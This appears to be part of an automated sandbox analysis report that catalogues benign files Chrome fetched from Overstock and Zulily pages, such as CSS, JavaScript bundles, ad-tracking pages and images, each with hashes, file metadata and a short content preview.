                                                                                                                                                                                    SSDEEP:768:lKiFCw9KZcQ04B8uol3jS3g4M0xPmlqzq0R7UrfXy8hTfwX881L5qTM6MsCP9vJv:sCt9KZcQf8DQNU4N6yJAM9
                                                                                                                                                                                    MD5:627A1CC38FD050B39190C42CA316C673
                                                                                                                                                                                    SHA1:08CAA20D2D37148EEB76E75A63EE5D420F8F33DA
                                                                                                                                                                                    SHA-256:A55857C41513B522263D75AA65BD0E147FC950FCFB037078872F1EB6076F7BD1
                                                                                                                                                                                    SHA-512:C85EF3E76F9DD883B13D02C19BDDBF9412A8E76171BAAC34D0933FE2FEA455514E4BD4C7D1B0810726E2E74AE17E229D4ED6BB253EB84B41F3E959494F5DD92F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:"use strict";(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[880],{2543:function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;t.default=function(){return function(e){if(window)try{window.dataLayer=window.dataLayer||[],window.dataLayer.push(e)}catch(e){console.error("Error pushing to dataLayer: ".concat(e))}}}},9880:function(e,t,i){var n=i(5318);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=n(i(7757)),a=n(i(8926)),r=n(i(9713)),l=n(i(3038)),s=i(8661),d=n(i(5697)),c=i(8422),p=i(4262),u=n(i(6380)),m=n(i(3971)),f=n(i(2543)),C=n(i(6229)),x=n(i(2325)),h=n(i(1615)),g=n(i(6486)),b=n(i(6532)),v=i(5437),w=i(6584);function y(e,t){var i=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),i.push.apply(i,n)}return i}function _(e){for(var t=1;t<arguments.length;t++){var i=null!=arguments[t]?arguments[t]:{
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):236064
                                                                                                                                                                                    Entropy (8bit):5.195770629378949
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:Agwu6Rt1SPF6p4UWKZ0XkpyRgLSaiHRUe/XuOZfPWA3eIfLyZhjCk69N0zINMOX6:ElSPKZ0Ue/HdeCiUDSF
                                                                                                                                                                                    MD5:4C965B143F80D0EAB27FB26A4B37AB3B
                                                                                                                                                                                    SHA1:BF64B89D9F081080B93C93DFD11C2CFB457681F2
                                                                                                                                                                                    SHA-256:21377182788CB986C201DB1447776A84B265380C1FB293EF9D5673E523DA37A2
                                                                                                                                                                                    SHA-512:6E123E68ABF6102295B213B232F764441E6E0EA8C4BEEB398624E96D597AFBB006E7C36EDB95086EE6AABF6702F2860AF033180255E4BD4B5AF82AA2EA335E3F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/app.whj6cDzT.css
                                                                                                                                                                                    Preview::root{--x-border-full: 1px;--x-border-block-end: 0 0 1px;--leu13r0: hsl(0, 0%, 85%);--x-border-radius-small: 3px;--x-border-radius-base: 5px;--x-border-radius-large: 10px;--x-border-radius-fully-rounded: 36px;--x-border-radius-none: 0;--x-border-width-base: 1px;--x-border-width-medium: 2px;--x-border-width-thick: 5px;--x-border-width-extra-thick: 10px}:root{--swn0j0: hsl(204, 77%, 39%);--swn0j1: hsl(0, 0%, 100%);--swn0j3: hsl(218, 100%, 99%);--swn0j4: hsl(218, 100%, 97%);--swn0j5: hsl(218, 100%, 94%);--swn0j6: hsla(204, 77%, 39%, .05);--swn0j2: hsl(204, 79%, 30%);--swn0j7: hsl(0, 0%, 0%);--swn0j8: hsl(213, 13%, 42%);--swn0j9: hsl(204, 77%, 39%);--swn0jb: hsl(204, 79%, 30%);--swn0ja: hsl(204, 79%, 30%);--swn0jc: hsl(0, 0%, 100%);--swn0jd: hsl(0, 0%, 100%);--swn0je: hsl(0, 77%, 49%);--swn0jg: hsl(0, 83%, 98%);--swn0jh: hsl(0, 89%, 96%);--swn0ji: hsl(0, 90%, 92%);--swn0jj: hsl(0, 0%, 100%);--swn0jk: hsl(0, 0%, 100%);--swn0jl: hsl(0, 77%, 49%);--swn0jf: hsl(0, 78%, 44%);--swn0jm: hsl(0, 91
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1610
                                                                                                                                                                                    Entropy (8bit):4.511513249076438
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:t3JfDutxQlA7k6/+ggshwmTcaQlA7k6/+ggshwmTcgf0Y1laepgCEzdkSzcHb:3XlArHgxtlArHgxgMKlaetsY
                                                                                                                                                                                    MD5:FBDE3F8CEEC0EA77C591897D9E3B75CE
                                                                                                                                                                                    SHA1:A3F68851F05B290E6783D27FA226B85EB5FE9DD3
                                                                                                                                                                                    SHA-256:CA55C33D7A9415A6FDAB6C0D883F5B7A16A82A33F987C6C09675F685125917F9
                                                                                                                                                                                    SHA-512:AA38884D40DB633397A53DD91895F2DBB4ACD85C3A6053E292541D51642C83C4258FC4ACC06ECBE2B03A09A3047C2950EC28E8B9083E4BEE7174D53435ACE215
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/star-75.svg
                                                                                                                                                                                    Preview:<svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_393_915)">.<path d="M5.4365 4.77644L7 0.965174L8.5635 4.77644C8.66194 5.01641 8.88513 5.19598 9.159 5.22265L13.1482 5.61105L10.1207 8.40306C9.92635 8.58228 9.84785 8.84948 9.90151 9.0994L10.7802 13.192L7.37658 11.0705C7.1456 10.9265 6.8544 10.9265 6.62342 11.0705L3.21981 13.192L4.09849 9.09941C4.15215 8.84948 4.07365 8.58228 3.87932 8.40306L0.851766 5.61105L4.84099 5.22265C5.11487 5.19598 5.33806 5.01641 5.4365 4.77644Z" stroke="#252525"/>.<path d="M5.4365 4.77644L7 0.965174L8.5635 4.77644C8.66194 5.01641 8.88513 5.19598 9.159 5.22265L13.1482 5.61105L10.1207 8.40306C9.92635 8.58228 9.84785 8.84948 9.90151 9.0994L10.7802 13.192L7.37658 11.0705C7.1456 10.9265 6.8544 10.9265 6.62342 11.0705L3.21981 13.192L4.09849 9.09941C4.15215 8.84948 4.07365 8.58228 3.87932 8.40306L0.851766 5.61105L4.84099 5.22265C5.11487 5.19598 5.33806 5.01641 5.4365 4.77644Z" stroke="#252525"/>.<p
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (7346), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7346
                                                                                                                                                                                    Entropy (8bit):5.660851131942489
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:yZyxg2cR8Bb/BhzBNYBgeB4kBKEB1qB3DKnBmIQBIZlBuFB+GBT9BnyBb3:y4xg2cR89/PzHYWe2kwEvqFKnEIQe3gm
                                                                                                                                                                                    MD5:6619459BC567064BA581D8D7ADC924AE
                                                                                                                                                                                    SHA1:79E4F03D4899169BA87FC187EBB66BC9165D4E69
                                                                                                                                                                                    SHA-256:A721986223EDDF908BF1889B79AA8143552590C8D0233A7FF1F95CB7A501DEE1
                                                                                                                                                                                    SHA-512:711777412159D0F405395037EB19732C022CA3B7D8855B7181DAFF37918E07E01F5901EDA2D5F3AEFB372E4AF3C5048EAA2316EC94AF06CDB5AC1989730619E6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://td.doubleclick.net/td/rul/11435964337?random=1730294607456&cv=11&fst=1730294607456&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0v9172781734z89176705627za201zb9176705627&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533421~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.overstock.com%2Fcollections%2Ffurniture&ref=https%3A%2F%2Fwww.overstock.com%2F&top=https%3A%2F%2Fwww.overstock.com%2F&hn=www.googleadservices.com&frm=2&tiba=Furniture%20-%20Overstock&npa=0&pscdl=noapi&auid=164462539.1730294546&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dpage_viewed
                                                                                                                                                                                    Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":15552000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s164462539.1730294546","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s164462539.1730294546\u0026ig_key=1sNHMxNjQ0NjI1MzkuMTczMDI5NDU0Ng!2saA-BUA!3sAAptDV6c_tWD\u0026tag_eid=44800267","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1szSHUfQ!2saA-BUA!3sAAptDV6c_tWD","1i44800267"],"userBiddingSignals":[["8604357350","8605118546","8605163949","8605117709","8604994774","8605218413","8605899945","8526177074","86049
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, was "z1m.js", last modified: Sat Jul 6 14:50:07 2024, from Unix, original size modulo 2^32 93431
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):24291
                                                                                                                                                                                    Entropy (8bit):7.988940707515992
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:2tOLbozf1bVUHjHVgX5bKxjbFd9ot7/9gxYjn3a8MEKNsvdZIFTayidamQ0OzeXg:2Yg7ZVUDHV25cfFd9oks3a1svdZqTjRJ
                                                                                                                                                                                    MD5:90D1EEDED272FB37F53F86368BFF6DD2
                                                                                                                                                                                    SHA1:B97209BD8884B92DE6BC60556584032C9D069A96
                                                                                                                                                                                    SHA-256:DE19C9F177E51DF305F4B04A136D1B15AD070F0A69D36A19882EC2B4D9F7D8FA
                                                                                                                                                                                    SHA-512:A12F8071C4048F4D70B35CB79D36D9EBC1D6BA5D34FD962D9FD758ED4BC9288B96531A510DE475C8DED0A2500126C6C59050AA85112E5A19C1270D9D34D25236
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.zineone.com/cloud/latest/z1m.js
                                                                                                                                                                                    Preview:.....Y.f..z1m.js..k{.F.(......j...D.2.....,;.....(Z>....$h......oU....AR.'g..<y,......U..........l:.....a....<.........g..z{.z......O.n.<.R.x.....lQ.{..V+s...E..L.+..q62....aQ....@.~....:..0..N....;_dE.M..C...$Z....v?..2.KT...e..~.M....X.f.r...=..]2....}....`.........2M.<.5`...?...UL...........wg/...,u..O.,....(...R.....s..tY....KX...f...2..q...9S.bC;..k..b.....u.;/._d......P..o.?..n+..L.o.v.$pI.5.......U+..0....r..i...;w......]e.5.....#......\..Zi..N...r~e..[1.......q1.<D........zpp.vy.1..V(..v.....%...Y....7..<.7^.bD.Z.UY.S.6.bg#0.u..z...`...4..\...U...~..*.C..,.d..-../`c...iRXf..#hq.S)..._...I......HfF.k%.....b.C...........7..7..v...-.'..R....O..J.xwz6|{../._!..x}~y..R.5..]M.<6.u..oc.S.s..."..=.w-sC+..........G...w.$.............m...T.........S.........6..V..T.o..T.xFY..(.dw..'.b.B.m0.&..=&@..._.bJ...W.....4.k..W.4.E+8...j.V.t... .6.....<..a..W...Ul...B!,..i,j...b....M?.....],..F......8....&..n.i...A.Mt...,.4...3.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, original size modulo 2^32 168180
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):46171
                                                                                                                                                                                    Entropy (8bit):7.994442356599265
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:768:GU1OIgf9Z5Sup6dmR6D/KUTcp5b/ozbuiKgsJOvYn0RCXbCWLqkJ:GU1wlZ5Su8dmY/T85besJ6c9LqkJ
                                                                                                                                                                                    MD5:8C746C08B412D2FD04BCA8389983D1CF
                                                                                                                                                                                    SHA1:404414E2495B7B20F08257FE8ACDAFAF825AF461
                                                                                                                                                                                    SHA-256:53B256B36E48EC1DD0EEF348C3ADED204AE7EE5FD451F5B5CC24B9716C435A2A
                                                                                                                                                                                    SHA-512:FD5EB0881B5AB40BFB11B8F3218B347B3EAD83D79B9D1FC48D865108090FBCDA275BEBB9080FE8FB4965984B44826EE8BD724033771249DFE3D23DB6DB063150
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.evgnet.com/beacon/c556855555573h9jz3n3n3p091552376/zulily/scripts/evergage.min.js
                                                                                                                                                                                    Preview:...........i{.F.0.........DQ..d..<.,.J...82'O.h..@.&H-.y~...^.X...d.{.;.."..^.....k.%m.b4.....9....77..<O.Y.&s>c.|.M.[+t..(w..6.o>.....7..f....Mlk?.f..d.>~.c;.X..G....C.^3*.y..6Kg..W.$[L.v6.oFy{.3.X.O#Y.#6..6.A.Z.6Os.......O9...[6...h..l6o.m{./....Ng....v...,..|>.E....l.V.....hO.k..=....k..7..<.w..UnG.?JlY.=.....eS>._._..,..WapS.l&... .$...e.q0.z......3.G..t..`.....b.p.S.....t..;l:M.l..J..V...kX".....~......d...'.......'.4..t...3......^.@&...p7.N.z8d..zb.s......4.;+.e~yOV.y2.pYa..z.m.. ..e..y@M=\. o.>..&.....]D.`...X..b...j...mnF..q...l.....x4...>b.y6... .......4.1Y....E..Z..-;!l..6...Yv..p...g3.....m.../.y[aF{...Y......c...".h.4Zc...+*.......Y..!O.py{.->.|..~`./...<67k]I@.....{z.#.Y.V^..-..........".. ....wg:...~.S..t..~..C&......G.2...Uc.i\..6.d.6.3,G...(%...C....K.0..>{............. ....\n..[.z2.,....o..X.I;D......../..!.H.IN1......5P;.w.G...D!._..?..k5.ocw......%..`D.C...D].z.^.l=..p.6....|.z......a..../.mC...APS...p......t.......Gp..z.6~..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1804
                                                                                                                                                                                    Entropy (8bit):6.980972845144794
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:pIl/XflhukkK0X9CexC9SMMLg4PKzJo48LCV+2A:pIl/XOC0QeoJJiaJo48LSS
                                                                                                                                                                                    MD5:913F2A57777DA99368339BABF5ED7B7F
                                                                                                                                                                                    SHA1:F310389E0553B3848633C42746835445F33A71CC
                                                                                                                                                                                    SHA-256:3525DD51294C6F9474C31D0830BB7C8451D1CD7203ED8766339973995745CBD2
                                                                                                                                                                                    SHA-512:9F514BC62BD0437357A97D6D63BDE242D3590E403CCCE6EC2998920DB233406DF9E499411E8250BB732593C8B703A50FF37970DD4E57D51194F301270AEFC942
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_328c658e-b885-41ed-aa07-03c57a4fed83.jpg?v=1729325108&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 t........*P.P.>1..B.!!.Y.. ....h..P....Zh....%sx_e....k=...[...."E.<X...I...O./.>...%$.w$u..?..QT).x..V..c+..>Q...|T-?-........o..*...M.0|E..i.....].....r..!.M..|.......>.\../.>"H.......k.......k...l...Fwk...S/.........Wa.[R.W....(...p.v.).=.....4M..{...*.Jc.8...~....~.;.G.......U.~~a.zx......U....,..(./5...t.Em....0..<.iLi!%......E.y.....{~.u....O!f.....cR./..R.Nc.6....).Rh%.K.b......].|...3..4.P^:..(/.Y....h.0....*xl.9~.=75..A........?...E.;.+....r....k1...8H/ v1......D.<e..,..@dH.k:..M...H..>....._.<}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (7346), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7346
                                                                                                                                                                                    Entropy (8bit):5.660824954209501
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:yZyxg4cW78Bb/BhzBNYBgeB4kBKEB1qB3DKnBmIQBIZlBuFB+GBT9BnyBb3:y4xg4cC89/PzHYWe2kwEvqFKnEIQe3gm
                                                                                                                                                                                    MD5:7F4BF9853FA8438C93B53ED2E6DF7859
                                                                                                                                                                                    SHA1:687438915B1E700FB1BCDFB4E9BE3380CA448673
                                                                                                                                                                                    SHA-256:4E9E860A075985A0F1EBB79EDEC62E008B60BC6166DA165951FD4116A27E54EB
                                                                                                                                                                                    SHA-512:C779D0D0FBF4547077F15D0A574025D32B7FBD9731767CF76B772E9FC18B9CBB81ED0A27696F7F9788146CCBA8D836CCA5316A2B36A7EFF6229E1FFA447A80F7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://td.doubleclick.net/td/rul/11435964337?random=1730294622584&cv=11&fst=1730294622584&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0v9172781734z89176705627za201zb9176705627&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533421~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.overstock.com%2Fproducts%2Fmia-oversized-modular-sectional-fabric-sofa-38169103%3Fvariant%3D50892052725919%26searchidx%3D0&top=https%3A%2F%2Fwww.overstock.com%2Fwpm%40d9f539ffw0e1474c4pae8b6d69m179c86ad%2Fcustom%2Fweb-pixel-17006751%4084%2Fsandbox%2Fmodern%2Fproducts%2Fmia-oversized-modular-sectional-fabric-sofa-38169103%3Fvariant%3D50892052725919%26searchidx%3D0&hn=www.googleadservices.com&frm=2&tiba=Mia%20Oversized%20Modular%20Sectional%20Fabric%20Sofa%20%E2%80%93%20Overstock&value=361.59&npa=0&pscdl=noapi&auid=164462539.1730294546&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dview_item%3Bgoogle_business_vertical%3Dretail%3Bid%3D41929634-000-010
                                                                                                                                                                                    Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":15552000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s164462539.1730294546","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s164462539.1730294546\u0026ig_key=1sNHMxNjQ0NjI1MzkuMTczMDI5NDU0Ng!2saA-BYA!3sAAptDV6jker1\u0026tag_eid=44800267","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1szSHUfQ!2saA-BYA!3sAAptDV6jker1","1i44800267"],"userBiddingSignals":[["8605218413","8605117709","8604992644","8605118546","8604357350","8605899945","8605163949","8526177074","86049
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (61316)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):61482
                                                                                                                                                                                    Entropy (8bit):5.508146171238403
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:uYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLIY:uYW2Pj5yO7t2ACRg8398vh
                                                                                                                                                                                    MD5:09FEC95508BB6201576D3B8FF8E19C37
                                                                                                                                                                                    SHA1:B8CD97960B326E41229792E1A0C92B39CBDAD4B8
                                                                                                                                                                                    SHA-256:948E757FEC2870BC5B65F95AE4637636DA5FB20A4EA3C20A6AC2CF82FFD240E6
                                                                                                                                                                                    SHA-512:D9647CFD7D12358EB4557B3D65AAFD7E9212C3101700CB923A66E3EA0EC2A23715B4FDE1C3B21142B8B6BEF8E858FB10515C2F127DF573B5BBAE1B284568876F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/web-pixel-shopify-app-pixel@0220/sandbox/worker.modern.js
                                                                                                                                                                                    Preview:(()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));var r=t.replace(/^\s+/,"").replace(/\(eval code/g,"(").replace(/^.*?\s+/,""),n=r.match(/ (\(.+\)$)/);r=n?r.replace(n[0],""):r;var i=this.extractL
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4103), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4103
                                                                                                                                                                                    Entropy (8bit):5.573234278412048
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:/2XjHtorvlP5rJ02moGkUtS6NYVbxb0wCp9s2ALwZxa:eJoTlPHfmookbjCpi4Zs
                                                                                                                                                                                    MD5:16D5D552603D86726AE439FC61299D42
                                                                                                                                                                                    SHA1:42E252A7AF04292577789C2DF07D88EF749A2B4C
                                                                                                                                                                                    SHA-256:9CA07DF45944B8440AE6241E4A017DB2B6E4600E5F647D3180C96877198C3552
                                                                                                                                                                                    SHA-512:F26A316E1D94DE19317113B75E1292AB1410D471E5F68BB24F93485F550B486AE6CB7EF9AF0B09F2A5AD4B3B57217A3A726BDA4265B8E0B22CF1E32296ACB2CD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(t){var r={};function i(n){var e;return(r[n]||(e=r[n]={i:n,l:!1,exports:{}},t[n].call(e.exports,e,e.exports,i),e.l=!0,e)).exports}i.m=t,i.c=r,i.d=function(n,e,t){i.o(n,e)||Object.defineProperty(n,e,{enumerable:!0,get:t})},i.r=function(n){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(n,"u",{value:!0})},i.t=function(e,n){if(1&n&&(e=i(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.u)return e;var t=Object.create(null);if(i.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var r in e)i.d(t,r,function(n){return e[n]}.bind(null,r));return t},i.n=function(n){var e=n&&n.u?function(){return n.default}:function(){return n};return i.d(e,"a",e),e},i.o=function(n,e){return Object.prototype.hasOwnProperty.call(n,e)},i.p="",i(i.s=0)}([function(n,e,t){var r,i,t=t(1);try{r="A7JYkbIvWKmS8mWYjXO12SIIsfPdI7twY91Y3LWOV/YbZmN1ZhYv8O+Zs6/IPCfBE99aV9tIC8sWZSCN09vf7gkAAACWey
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):29852
                                                                                                                                                                                    Entropy (8bit):7.943195636160391
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:uMhUPFnLr2IxWsr9vD4xd86rdcEvPROB9IJvaBg:uMoLr2e/r9vl6LSqJvn
                                                                                                                                                                                    MD5:13CA8CD3BCA692F5F292D1E1AF461374
                                                                                                                                                                                    SHA1:C9654BD64092FF8E7DEFD9FF801C9F39AF5C2C19
                                                                                                                                                                                    SHA-256:27D9EDC971394BF959DAC1073ADBB9617ACFC50361A7474033AB1F2A130A40F5
                                                                                                                                                                                    SHA-512:366BD1C31EA8F83A3DBA2D3812AB21188397DC4CC78F3E575CB01F03891AFC87FBE077670BECB5F9573A5DA0DBA3E899808B1ADD55BD17F781F207F7449F7C7E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@....................................................................................(....!...P ..................F..........&Re.G.(..8.\.g.&..Q.9... -ppp.......B...@@...Q.d..J[Xk..`0ppp....p..p.....p..8!.X9.........Q..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (27764)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):47216
                                                                                                                                                                                    Entropy (8bit):5.347541950508692
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:dgLivxJv6rqgLInXZZZx6+VWjq0Lui7A9GMUkrpBRAuME+nIFB6bpCTkN5UNtzUg:WLivLv6rLLInXZZZx6+VWu0LuisY+pbd
                                                                                                                                                                                    MD5:5A9B91D12FC14C146D04E6795BA043D5
                                                                                                                                                                                    SHA1:3ED1DD79AAE0C7EE43589A716F0CED6C52850F12
                                                                                                                                                                                    SHA-256:C27315945898DCA4F2A6D5317656C3FB3BB610060CFE4F13345D0DEAA9D987F4
                                                                                                                                                                                    SHA-512:898A4B81CA95D806432C8A7E005C2D15812C94A7D809603C5A8AFE1A4101DA3F2C0F3F5E3A820ECF7F7A14DFCDA01A9576430FE8480197766502B3A8E57859D7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
